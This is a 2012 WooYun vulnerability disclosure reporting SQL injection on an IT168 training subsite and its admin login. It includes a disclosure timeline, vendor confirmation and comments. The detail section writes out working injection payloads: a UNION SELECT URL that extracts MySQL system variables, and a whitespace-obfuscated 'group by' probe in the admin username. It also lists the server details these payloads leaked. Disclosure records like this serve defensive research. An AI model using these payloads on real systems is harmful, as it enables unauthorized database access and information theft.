当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04269

漏洞标题:It168分站多处SQL注射漏洞和后台地址泄露

相关厂商:IT168.com

漏洞作者: 孤狐浪子

提交时间:2012-02-06 18:48

修复时间:2012-03-22 18:49

公开时间:2012-03-22 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-02-06: 细节已通知厂商并且等待厂商处理中
2012-02-07: 厂商已经确认,细节仅向厂商公开
2012-02-17: 细节向核心白帽子及相关领域专家公开
2012-02-27: 细节向普通白帽子公开
2012-03-08: 细节向实习白帽子公开
2012-03-22: 细节向公众公开

简要描述:

IT168分站多处Sql注射漏洞,后台登录也存在sql注射,爆出数据库结构,后台管理信息泄露, 爆出主机相关信息,导致信息泄漏。望管理员老大迅速修复,以免被其它恶意利用。

详细说明:

http://peixun.it168.com/more.php?id=1   And 1=2 UNION all SELECT 1,CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user(),@@group_concat_max_len,@@dAtadir,@@tmpDir,@@baseDir) ,3,4,5,6,7,8,9,10 --+-


后台注射:

http://peixun.it168.com/admin/manager.php
username=123%27%0D%0D%0Dgroup%0DbY%0D5%0D%23%0D 判断存在5个字段。
&password=11111

漏洞证明:

相关信息:

Os:unknown-linux-gnu
Ver:5.1.40-log
User:product@localhost
Base:db_edu
BaseDir:/usr/local/mysql/
HostName:dl11.it168.com
DataDir:/data/mysql/
TmpDir:/tmp
Group_max_len:1024
Port:3306
Pid_File:/data/mysql/dl11.it168.com.pid
Log_err:/data/mysql/dl11.it168.com.err
SLOW_QUERY_LOG_FILE:/data/mysql/dl11-slow.log
GENERAL_LOG_FILE:/data/mysql/dl11.log


修复方案:

过滤

版权声明:转载请注明来源 孤狐浪子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-02-07 00:24

厂商回复:

多谢各位,已经在处理修复中

最新状态:

暂无


漏洞评价:

评论

  1. 2012-02-06 19:24 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    最近很多人研究IT168,过两天也看看,是什么情况

  2. 2012-02-06 19:35 | 孤狐浪子 ( 普通白帽子 | Rank:310 漏洞数:32 )

    因为最近IT168搞活动,挖BUG有礼品。

  3. 2012-02-06 19:38 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    有这好事?回家好好看看。

  4. 2012-02-07 00:28 | IT168.com(乌云厂商)

    @孤狐浪子 有什么礼品呢?

  5. 2012-02-07 00:33 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    — —,你是厂家,这个你懂啊。求联系方式。 IT168.com QQ2036234

  6. 2012-02-13 09:21 | IT168.com(乌云厂商)

    @孤狐浪子 求联系方式